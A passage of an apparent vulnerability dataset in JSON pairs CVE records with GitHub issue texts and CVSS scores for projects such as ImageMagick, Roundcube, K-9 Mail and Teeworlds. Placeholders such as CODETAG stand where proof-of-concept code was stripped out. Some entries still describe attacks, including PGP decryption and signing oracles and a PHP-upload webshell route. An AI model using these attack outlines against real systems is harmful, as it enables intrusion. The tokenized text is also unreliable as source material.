  33900. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33901. "severity": "MEDIUM",
  33902. "baseScore": 5.5,
  33903. "impactScore": 3.6,
  33904. "exploitabilityScore": 1.8
  33905. },
  33906. {
  33907. "CVE_ID": "CVE-2019-10650",
  33908. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1532",
  33909. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1532",
  33910. "Repo_new": "imagemagick/imagemagick",
  33911. "Issue_Created_At": "2019-03-28T15:33:16Z",
  33912. "description": "heap buffer overflow in APITAG of coders/tiff.c. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/tiff.c. Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa]fa fa NUMBERTAG fa fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fd fa fa fa fd fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa fa fa fd fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fa fa fa fa fa fa fa fa fd fa APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo 
png tiff wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
  33913. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  33914. "severity": "HIGH",
  33915. "baseScore": 8.1,
  33916. "impactScore": 5.2,
  33917. "exploitabilityScore": 2.8
  33918. },
  33919. {
  33920. "CVE_ID": "CVE-2019-10652",
  33921. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/38",
  33922. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/38",
  33923. "Repo_new": "flatcore/flatcore-cms",
  33924. "Issue_Created_At": "2019-03-29T02:49:24Z",
  33925. "description": "There is an arbitrary file upload vulnerability. There are any files uploaded in the background of your website, you can upload PHP files, so that if the administrator password is leaked, the file uploaded through here can be directly getshell, take over the web example: FILETAG FILETAG I think you should limit the type of file you upload",
  33926. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  33927. "severity": "HIGH",
  33928. "baseScore": 7.2,
  33929. "impactScore": 5.9,
  33930. "exploitabilityScore": 1.2
  33931. },
  33932. {
  33933. "CVE_ID": "CVE-2019-10654",
  33934. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/108",
  33935. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/108",
  33936. "Repo_new": "ckolivas/lrzip",
  33937. "Issue_Created_At": "2019-03-21T13:20:51Z",
  33938. "description": "invalid memory read in lzo1x_decompress, which is different from CVETAG . On lrzip NUMBERTAG there is an invalid memory read in lzo1x_decompress, which is different from CVETAG . POC is here: FILETAG ERRORTAG",
  33939. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33940. "severity": "MEDIUM",
  33941. "baseScore": 5.5,
  33942. "impactScore": 3.6,
  33943. "exploitabilityScore": 1.8
  33944. },
  33945. {
  33946. "CVE_ID": "CVE-2019-10686",
  33947. "Issue_Url_old": "https://github.com/ctripcorp/apollo/issues/2103",
  33948. "Issue_Url_new": "https://github.com/apolloconfig/apollo/issues/2103",
  33949. "Repo_new": "apolloconfig/apollo",
  33950. "Issue_Created_At": "2019-04-01T09:55:54Z",
  33951. "description": "PATHTAG \u95ee\u9898\u8bf4\u660e PATHTAG \u6e90\u7801 CODETAG NUMBERTAG poc APITAG APITAG NUMBERTAG APITAG APITAG APITAG",
  33952. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  33953. "severity": "CRITICAL",
  33954. "baseScore": 10.0,
  33955. "impactScore": 6.0,
  33956. "exploitabilityScore": 3.9
  33957. },
  33958. {
  33959. "CVE_ID": "CVE-2019-10714",
  33960. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1495",
  33961. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1495",
  33962. "Repo_new": "imagemagick/imagemagick",
  33963. "Issue_Created_At": "2019-03-04T14:35:44Z",
  33964. "description": "Out of boundary in function APITAG of APITAG Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description CODETAG The parameter c missing check in function APITAG which may lead to out of boundary vulnerability. Steps to Reproduce URLTAG APITAG In the gdb: ERRORTAG System Configuration APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: dk from Chaitin Tech",
  33965. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33966. "severity": "MEDIUM",
  33967. "baseScore": 6.5,
  33968. "impactScore": 3.6,
  33969. "exploitabilityScore": 2.8
  33970. },
  33971. {
  33972. "CVE_ID": "CVE-2019-10740",
  33973. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6638",
  33974. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6638",
  33975. "Repo_new": "roundcube/roundcubemail",
  33976. "Issue_Created_At": "2019-02-22T10:49:17Z",
  33977. "description": "Decryption Oracle based on replying to PGP encrypted emails. In the scope of academic research in cooperation with Ruhr Uni Bochum and FH M\u00fcnster, Germany we discovered a security issue in APITAG An attacker who is in possession of PGP encrypted messages can embed them into a multipart message and re send them to the intended receiver. When the message is read and decrypted by the receiver, the attacker's content is shown. If the victim replies, the plaintext is leaked to an attacker's email address. The root cause for these vulnerabilities lies in the way Roundcube (and many other mail clients) handle partially encrypted multipart messages. Leaking plaintext through replies Attacker model : Attacker is in possession of PGP encrypted messages, which she may have obtained as passive man in the middle or by actively hacking into the victim's mail server or gateway Attacker's goal : Leak the plaintext by wrapping the ciphertext part within a benign looking MIME mail sent to and decrypted+replied to by the victim Attack outline: If Roundcube receives a multipart email, as depicted below, it decrypt the ciphertext part(s), together with the attacker controlled text (which may be prepended and/or appended). APITAG A benign looking attacker's text may lure the victim into replying. Because the decrypted part is also quoted in the reply, the user unintentionally acts as a decryption oracle. To obfuscate the existence of the encrypted part(s), the attacker may add a lot of newlines or hide it within a long conversation history. A user replying to such a \u2018mixed content\u2019 conversation thereby leaks the plaintext of encrypted messages wrapped within attacker controlled text. Countermeasures Do not decrypt emails unless the PGP encrypted part is the root node and therefore the only part in the MIME tree.",
  33978. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  33979. "severity": "MEDIUM",
  33980. "baseScore": 4.3,
  33981. "impactScore": 1.4,
  33982. "exploitabilityScore": 2.8
  33983. },
  33984. {
  33985. "CVE_ID": "CVE-2019-10741",
  33986. "Issue_Url_old": "https://github.com/k9mail/k-9/issues/3925",
  33987. "Issue_Url_new": "https://github.com/thundernest/k-9/issues/3925",
  33988. "Repo_new": "thundernest/k-9",
  33989. "Issue_Created_At": "2019-02-23T16:49:30Z",
  33990. "description": "Signing Oracle based on keeping CSS styles in replies to HTML emails. Dear K NUMBERTAG Mail team, In the scope of academic research in cooperation with Ruhr Uni Bochum and FH M\u00fcnster, Germany we discovered a security issue in K NUMBERTAG Mail when used in combination with PGP APITAG ): K NUMBERTAG Mail quotes and includes CSS internal APITAG elements in email replies. This allows an attacker to abuse K NUMBERTAG Mail as a signing oracle for arbitrary PGP signed emails. The attack is outlined as follows: Attack scenario Digital signatures should guarantee integrity, authenticity, and non repudiation of messages. To give an example, Johnny could be a commander in chief who takes information security seriously. All his emails are digitally signed, making it hard to impersonate him in order to send forged statements or instructions. The goal of our attacker Eve is to start false flag warfare. Therefore she needs to obtain a digitally signed \"declaration of war\" which she can forward to the armed forces. General idea Eve now sends an email to commander Johnny, in which she hides her malicious content using CSS while a benign text message, such as APITAG up Johnny?\", is added to be shown by K NUMBERTAG Mail. Similarly, the benign text can be hidden while showing the malicious content, based on CSS conditional rules which are satisfied only for a third party. If Johnny replies to such a specially crafted HTML/CSS email, he signs arbitrary covert content along with visible content. This signed message can then be forwarded by Eve to a third party (e.g., the armed forces) where it displays the previously hidden malicious content \"I hereby declare war\". A simple example email is given below: CODETAG In this example, different content is shown based on the device's screen resolution. It can be used to obtain a signed email from a mobile device, where a benign message is shown. 
The reply message instead displays a (signed) declaration of war when shown on a desktop mail client. Conditional CSS rules The W3C specifies CSS conditional rules (e.g., APITAG ) which allow different formatting based on conditions such as screen width or orientation. For example, a different text can be shown whether a mobile phone is hold in portrait or landscape mode or whether the document is displayed on a screen or printed out. But there are lots of other options: for example, mail clients can be fingerprinted based on the APITAG conditional rule or various proprietary conditional statements of certain clients can be applied. Without going into detail here, in the scope of our research we found conditional CSS to show/hide certain text for virtually every email client that exists. CSS blinding options We identified seven CSS properties which can be used for covert content attacks as shown below. However, this list is unlikely to be complete because CSS is very complex and offers more possibilities to hide text. CODETAG Impact The attack allows Eve to obtain valid signatures for arbitrary content to be displayed. This can be used to trick a third party, which relies on the authenticity and integrity of signed messages, to perform certain actions (such as starting a war). A forensic analysis can reveal the deception, but then it may already be too late (the war is already declared). Countermeasures There are three options to counter the attack, each with a usability security trade off NUMBERTAG Drop CSS support in general : Conditional CSS makes it easy for an attacker to hide certain text within a signed message while showing different text. Ideally, clients would ignore CSS in received emails. However, this is an unrealistic scenario given today's usage of email. 
Sanitizing conditional CSS rules and properties which can be used to hide content is feasible, but it may be insufficient as web technologies are constantly evolving NUMBERTAG Only ASCII text in replies : It should not harm the user experience if mail clients converted quoted messages into ASCII text when replying to an email. Various clients are already doing this. Thus, we recommend that security focused clients should adopt this behavior NUMBERTAG Remove CSS styles in replies : Email clients should not sign any quoted CSS APITAG (or APITAG ) from the original message, so that they cannot be used as signing oracles, based on blinding text with CSS conditional statements. Greetings, Jens",
  33991. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  33992. "severity": "MEDIUM",
  33993. "baseScore": 4.3,
  33994. "impactScore": 1.4,
  33995. "exploitabilityScore": 2.8
  33996. },
  33997. {
  33998. "CVE_ID": "CVE-2019-10773",
  33999. "Issue_Url_old": "https://github.com/yarnpkg/yarn/issues/7761",
  34000. "Issue_Url_new": "https://github.com/yarnpkg/yarn/issues/7761",
  34001. "Repo_new": "yarnpkg/yarn",
  34002. "Issue_Created_At": "2019-12-12T08:13:35Z",
  34003. "description": "globally installed package overwrites an existing binary in the target install location. APITAG npm has announced vulnerabilities that npm has been fixed. URLTAG One of the vulnerabilities has been fixed at yarn NUMBERTAG Thank you! \ud83d\udc4f\ud83d\udc4f\ud83d\udc4f But yarn hasn't fixed the other yet. Do you have any plans to fix this? Do you want to request a feature or report a bug ? APITAG bug? What is the current behavior? globally installed package overwrites an existing binary in the target install location. If the current behavior is a bug, please provide the steps to reproduce. APITAG create a symlink named create react app into a directory that yarn uses for globally install. APITAG The symlink has been overwritten What is the expected behavior? Do not overwrite the symlink. Please mention your FILETAG , yarn and operating system version. Node: APITAG Yarn NUMBERTAG OS: APITAG NUMBERTAG",
  34004. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34005. "severity": "HIGH",
  34006. "baseScore": 7.8,
  34007. "impactScore": 5.9,
  34008. "exploitabilityScore": 1.8
  34009. },
  34010. {
  34011. "CVE_ID": "CVE-2019-10842",
  34012. "Issue_Url_old": "https://github.com/twbs/bootstrap-sass/issues/1195",
  34013. "Issue_Url_new": "https://github.com/twbs/bootstrap-sass/issues/1195",
  34014. "Repo_new": "twbs/bootstrap-sass",
  34015. "Issue_Created_At": "2019-03-26T22:59:52Z",
  34016. "description": "NUMBERTAG Hi there, We noticed that NUMBERTAG was yanked, and NUMBERTAG was published to APITAG We thought this might be because of ruby sass being deprecated URLTAG , but we can't seem to see the NUMBERTAG code on APITAG Looking further, there's APITAG looking code in what I installed via APITAG : ERRORTAG I have not run this, and I'm a little concerned about what's going on here. Please advise.",
  34017. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34018. "severity": "CRITICAL",
  34019. "baseScore": 9.8,
  34020. "impactScore": 5.9,
  34021. "exploitabilityScore": 3.9
  34022. },
  34023. {
  34024. "CVE_ID": "CVE-2019-10844",
  34025. "Issue_Url_old": "https://github.com/sony/nnabla/issues/209",
  34026. "Issue_Url_new": "https://github.com/sony/nnabla/issues/209",
  34027. "Repo_new": "sony/nnabla",
  34028. "Issue_Created_At": "2018-07-16T07:19:30Z",
  34029. "description": "Reliance on Untrusted Inputs in a Security Decision. Team, File: PATHTAG CODETAG Environment variables are untrusted input if they can be set by an attacker. They can have any content and length, and the same variable can be set more than once, such as in ( CVETAG , CVETAG ).",
  34030. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34031. "severity": "CRITICAL",
  34032. "baseScore": 9.8,
  34033. "impactScore": 5.9,
  34034. "exploitabilityScore": 3.9
  34035. },
  34036. {
  34037. "CVE_ID": "CVE-2019-10877",
  34038. "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2071",
  34039. "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2071",
  34040. "Repo_new": "teeworlds/teeworlds",
  34041. "Issue_Created_At": "2019-03-22T16:11:41Z",
  34042. "description": "Integer overflow and null pointer dereference in APITAG in PATHTAG Hello Teeworlds dev team, There is an integer overflow in APITAG which can lead to a buffer overflow. ERRORTAG APITAG and APITAG can be arbitrary integers and there is no check for an integer overflow when multiplying these integers with each other and with APITAG . Also, there is no check whether mem_alloc returns NULL, which can lead to a null pointer dereference. Regards, Mans van Someren FILETAG",
  34043. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34044. "severity": "CRITICAL",
  34045. "baseScore": 9.8,
  34046. "impactScore": 5.9,
  34047. "exploitabilityScore": 3.9
  34048. },
  34049. {
  34050. "CVE_ID": "CVE-2019-10878",
  34051. "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2073",
  34052. "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2073",
  34053. "Repo_new": "teeworlds/teeworlds",
  34054. "Issue_Created_At": "2019-03-22T16:24:33Z",
  34055. "description": "Failed bounds check in APITAG and APITAG and related functions in PATHTAG leading to arbitrary free and OOB pointer write. Hello Teeworlds dev team, There is a failed bounds check in APITAG and APITAG and related functions which can lead to an arbitrary free and OOB pointer write, and possibly to RCE. ERRORTAG These functions get called with the integer Index being an arbitrary value, thus leading to an arbitrary write of a pointer at the line APITAG and an arbitrary free at the line ERRORTAG (which should probably also have a stricter bounds check). ERRORTAG Regards, Mans van Someren FILETAG",
  34056. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34057. "severity": "CRITICAL",
  34058. "baseScore": 9.8,
  34059. "impactScore": 5.9,
  34060. "exploitabilityScore": 3.9
  34061. },
  34062. {
  34063. "CVE_ID": "CVE-2019-10879",
  34064. "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2070",
  34065. "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2070",
  34066. "Repo_new": "teeworlds/teeworlds",
  34067. "Issue_Created_At": "2019-03-22T16:05:44Z",
  34068. "description": "Integer overflow(s) in APITAG in PATHTAG Hello Teeworlds dev team, There is an integer overflow bug in APITAG which can lead to a buffer overflow and possibly RCE. The integer overflow(s) occur when calculating the Size and APITAG ERRORTAG As you can see, there is no check to see if Size or APITAG overflow. The integer overflow of APITAG can lead to APITAG being smaller than Size. APITAG then gets used to allocate memory for the APITAG object and Size gets used to read data into this object, leading to a buffer overflow. ERRORTAG Regards, Mans van Someren FILETAG",
  34069. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34070. "severity": "CRITICAL",
  34071. "baseScore": 9.8,
  34072. "impactScore": 5.9,
  34073. "exploitabilityScore": 3.9
  34074. },
  34075. {
  34076. "CVE_ID": "CVE-2019-10888",
  34077. "Issue_Url_old": "https://github.com/yxcmf/ukcms/issues/4",
  34078. "Issue_Url_new": "https://github.com/yxcmf/ukcms/issues/4",
  34079. "Repo_new": "yxcmf/ukcms",
  34080. "Issue_Created_At": "2019-04-02T03:23:50Z",
  34081. "description": "PATHTAG CSRF NUMBERTAG before FILETAG click dirty button FILETAG adding user FILETAG add succeed FILETAG EXP: CODETAG",
  34082. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  34083. "severity": "HIGH",
  34084. "baseScore": 8.8,
  34085. "impactScore": 5.9,
  34086. "exploitabilityScore": 2.8
  34087. },
  34088. {
  34089. "CVE_ID": "CVE-2019-10904",
  34090. "Issue_Url_old": "https://github.com/python/bugs.python.org/issues/34",
  34091. "Issue_Url_new": "https://github.com/python/bugs.python.org/issues/34",
  34092. "Repo_new": "python/bugs.python.org",
  34093. "Issue_Created_At": "2019-03-21T15:31:57Z",
  34094. "description": "XSS on ERRORTAG page of APITAG There's an XSS on the error page of APITAG CVETAG APITAG sure if this is the right place to report it, I already reported it to the python bugtracker itself despite it having no proper category for it CVETAG )",
  34095. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34096. "severity": "MEDIUM",
  34097. "baseScore": 6.1,
  34098. "impactScore": 2.7,
  34099. "exploitabilityScore": 2.8
  34100. },
  34101. {
  34102. "CVE_ID": "CVE-2019-10905",
  34103. "Issue_Url_old": "https://github.com/erusev/parsedown/issues/699",
  34104. "Issue_Url_new": "https://github.com/erusev/parsedown/issues/699",
  34105. "Repo_new": "erusev/parsedown",
  34106. "Issue_Created_At": "2019-03-17T16:16:17Z",
  34107. "description": "Injecting classnames into code blocks. In safe mode with html markup disabled, it is possible to insert any classname into a code block like this: > \\ APITAG renders as: APITAG infostring needs some cleanup here: URLTAG",
  34108. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34109. "severity": "HIGH",
  34110. "baseScore": 8.1,
  34111. "impactScore": 5.9,
  34112. "exploitabilityScore": 2.2
  34113. },
  34114. {
  34115. "CVE_ID": "CVE-2019-10914",
  34116. "Issue_Url_old": "https://github.com/matrixssl/matrixssl/issues/26",
  34117. "Issue_Url_new": "https://github.com/matrixssl/matrixssl/issues/26",
  34118. "Repo_new": "matrixssl/matrixssl",
  34119. "Issue_Created_At": "2019-02-15T00:05:35Z",
  34120. "description": "URGENT: Stack buffer overflow verifying NUMBERTAG certificate. Hello, while auditing some code using the APITAG library (currently sold as the Inside Secure TLS Toolkit, previously also called GUARD TLS Toolkit), I happened to notice that a public NUMBERTAG certificate testcase for CVETAG caused a stack buffer overflow. I cleaned up the testcase a bit, to make a better demonstration. You can test it with the APITAG tool that comes with APITAG CODETAG I believe any client or server that validates certificates will be affected by this, and as APITAG is usually used in embedded devices where mitigations are usually not quite as thorough as modern distributions, exploitation might not be difficult. The bug is that APITAG uses a fixed size stack buffer, but then doesn't check if the key size exceeds it. The patch below\u00a0should solve it. ERRORTAG Testcase: FILETAG",
  34121. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34122. "severity": "CRITICAL",
  34123. "baseScore": 9.8,
  34124. "impactScore": 5.9,
  34125. "exploitabilityScore": 3.9
  34126. },
  34127. {
  34128. "CVE_ID": "CVE-2019-11002",
  34129. "Issue_Url_old": "https://github.com/Dogfalo/materialize/issues/6286",
  34130. "Issue_Url_new": "https://github.com/dogfalo/materialize/issues/6286",
  34131. "Repo_new": "dogfalo/materialize",
  34132. "Issue_Created_At": "2019-02-08T16:46:36Z",
  34133. "description": "Security question: Use HTML by default for PATHTAG and expose an XSS. Expected Behavior Don't execute html/javascript by default for Toasts, Tooltips and Autocomplete Current Behavior By default when you add dynamics contents like Toast, Tooltips and autocomplete you inject inputs data as HTML. I think all people who use APITAG implement compontents like your examples. It's a bad practice and by default, your input data could be sanitize or use APITAG instead APITAG or APITAG = APITAG Possible Solution If you want allow HTML, why not but sanitize the html and don't allow javascript. If the end user want allow HTML and javascript add a new configuration with a parameter like options : { APITAG true } Steps to Reproduce (for bugs) Toast APITAG Tooltips APITAG Autocomplete CODETAG Context I'm agree about the developper need control his data before inject it in a third party library but sametime we forget to do it. How i find this case NUMBERTAG APITAG Send javascript in a field NUMBERTAG APITAG Server fail and return message with javascript NUMBERTAG APITAG Reuse the message from the server and use the Toast NUMBERTAG I have a reflected XSS It's my fault, I didn't validate datas and I returned this script without sanitize. If by default your library don't allow html, I will not find this behavior. Your Environment Version used NUMBERTAG and NUMBERTAG",
  34134. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  34135. "severity": "MEDIUM",
  34136. "baseScore": 6.1,
  34137. "impactScore": 2.7,
  34138. "exploitabilityScore": 2.8
  34139. },
  34140. {
  34141. "CVE_ID": "CVE-2019-11018",
  34142. "Issue_Url_old": "https://github.com/zoujingli/ThinkAdmin/issues/173",
  34143. "Issue_Url_new": "https://github.com/zoujingli/thinkadmin/issues/173",
  34144. "Repo_new": "zoujingli/thinkadmin",
  34145. "Issue_Created_At": "2019-04-06T13:40:53Z",
  34146. "description": "APITAG NUMBERTAG authority APITAG Disclosure vulnerability. There is an authority APITAG Disclosure vulnerability APITAG NUMBERTAG As admin, if you change your password, your cookie won't become invalid; it stays valid until the end of its life cycle. So if attackers got the admin's cookie, even if traces of the attackers were found and the admin changed his password, the attackers can still enter the managed system. POC: APITAG the attacker got admin's cookie. FILETAG NUMBERTAG We use Edit_this_cookie to change cookie . FILETAG APITAG change his own password FILETAG NUMBERTAG We can see attackers still have access to this manage system. FILETAG I have analyzed the source code that results in this vulnerability. The problem is present in PATHTAG The original source code is: ERRORTAG And for this, I have made a padding. ERRORTAG Author:schur EMAILTAG",
  34147. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  34148. "severity": "CRITICAL",
  34149. "baseScore": 9.8,
  34150. "impactScore": 5.9,
  34151. "exploitabilityScore": 3.9
  34152. },
  34153. {
  34154. "CVE_ID": "CVE-2019-11024",
  34155. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/85",
  34156. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/85",
  34157. "Repo_new": "saitoha/libsixel",
  34158. "Issue_Created_At": "2019-03-29T05:47:49Z",
  34159. "description": "infinite recursive loop in load_pnm( ). Description : we Observerd an infinite recursive loop at function load_pnm( ) at file frompnm.c which can lead to a denial of service attack. Command : ./img2sixel APITAG w NUMBERTAG h NUMBERTAG q auto l force o out $POC POC : REPRODUCER URLTAG DEBUG : ~~~ Gdb: [ Legend: Modified register | Code | Heap | Stack | String ] APITAG registers \u2500\u2500\u2500\u2500 $ra NUMBERTAG fffffffd NUMBERTAG f NUMBERTAG rb NUMBERTAG fffffffd2a NUMBERTAG fffffffd NUMBERTAG rc NUMBERTAG fffffffd NUMBERTAG rd NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG bebebebe NUMBERTAG rbp NUMBERTAG fffffffd2c NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG fffffffd7f NUMBERTAG fffffffddb NUMBERTAG c NUMBERTAG APITAG push r NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rip NUMBERTAG ffff6c NUMBERTAG ec1 \u2192 APITAG mov rax, QWORD PTR [rbp NUMBERTAG f0] $r NUMBERTAG r NUMBERTAG d0 $r NUMBERTAG b1 $r NUMBERTAG ffff6ef6ab0 \u2192 APITAG push rbp $r NUMBERTAG ffffffff9fc NUMBERTAG r NUMBERTAG fffffffcfe NUMBERTAG b NUMBERTAG ab3 $r NUMBERTAG fffffffcfe NUMBERTAG b NUMBERTAG ab3 $r NUMBERTAG eflags: [CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow resume virtual NUMBERTAG identification] $cs NUMBERTAG ss NUMBERTAG b $ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG APITAG stack NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG bebebebe NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG ffffffff NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG dfcc NUMBERTAG ffffffff NUMBERTAG fffffffcf NUMBERTAG dfc NUMBERTAG fffffffcf NUMBERTAG dfb NUMBERTAG efb NUMBERTAG ffff NUMBERTAG fffffffcf NUMBERTAG dfd NUMBERTAG bebebebe NUMBERTAG APITAG code NUMBERTAG ffff6c NUMBERTAG eac APITAG mov QWORD PTR [rbp NUMBERTAG ra NUMBERTAG ffff6c NUMBERTAG eb3 APITAG lea rax, [rb NUMBERTAG ffff6c NUMBERTAG eba APITAG mov QWORD PTR [rbp NUMBERTAG f0], ra NUMBERTAG ffff6c NUMBERTAG ec1 APITAG mov rax, 
QWORD PTR [rbp NUMBERTAG f NUMBERTAG ffff6c NUMBERTAG ec8 APITAG mov rdx, ra NUMBERTAG ffff6c NUMBERTAG ecb APITAG shr rd NUMBERTAG ffff6c NUMBERTAG ecf APITAG add rd NUMBERTAG fff NUMBERTAG ffff6c NUMBERTAG ed6 APITAG movzx edx, BYTE PTR [rd NUMBERTAG ffff6c NUMBERTAG ed9 APITAG test dl, dl APITAG APITAG NUMBERTAG for (y NUMBERTAG y APITAG = end NUMBERTAG break NUMBERTAG p = pnm_get_line(p, end, tmp NUMBERTAG s = tmp; APITAG threads NUMBERTAG Id NUMBERTAG Name: \"img2sixel\", stopped, reason: SIGINT APITAG trace NUMBERTAG ffff6c NUMBERTAG ec1 \u2192 load_pnm(p NUMBERTAG d NUMBERTAG a NUMBERTAG repeats NUMBERTAG times>, length NUMBERTAG allocator NUMBERTAG dfd0, result NUMBERTAG dfb8, ps NUMBERTAG dfc8, psy NUMBERTAG dfcc, ppalette NUMBERTAG pncolors NUMBERTAG dfd0, ppixelformat NUMBERTAG dfd NUMBERTAG ffff6c NUMBERTAG b3 \u2192 APITAG fstatic NUMBERTAG fuse_palette NUMBERTAG reqcolors NUMBERTAG bgcolor NUMBERTAG loop_control NUMBERTAG fn_load NUMBERTAG ffff6c NUMBERTAG ad6 APITAG , context NUMBERTAG f NUMBERTAG ffff6c NUMBERTAG f \u2192 APITAG \"hang NUMBERTAG fstatic NUMBERTAG fuse_palette NUMBERTAG reqcolors NUMBERTAG bgcolor NUMBERTAG loop_control NUMBERTAG fn_load NUMBERTAG ffff6c NUMBERTAG ad6 APITAG , finsecure NUMBERTAG cancel_flag NUMBERTAG ac0 APITAG , context NUMBERTAG f NUMBERTAG allocator NUMBERTAG dfd NUMBERTAG ffff6c NUMBERTAG f5b \u2192 APITAG filename NUMBERTAG fffffffe2b1 \"hang NUMBERTAG ce \u2192 main(argc NUMBERTAG d, arg NUMBERTAG fffffffde NUMBERTAG",
  34160. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  34161. "severity": "MEDIUM",
  34162. "baseScore": 5.5,
  34163. "impactScore": 3.6,
  34164. "exploitabilityScore": 1.8
  34165. },
  34166. {
  34167. "CVE_ID": "CVE-2019-11025",
  34168. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/2581",
  34169. "Issue_Url_new": "https://github.com/cacti/cacti/issues/2581",
  34170. "Repo_new": "cacti/cacti",
  34171. "Issue_Created_At": "2019-03-28T10:14:04Z",
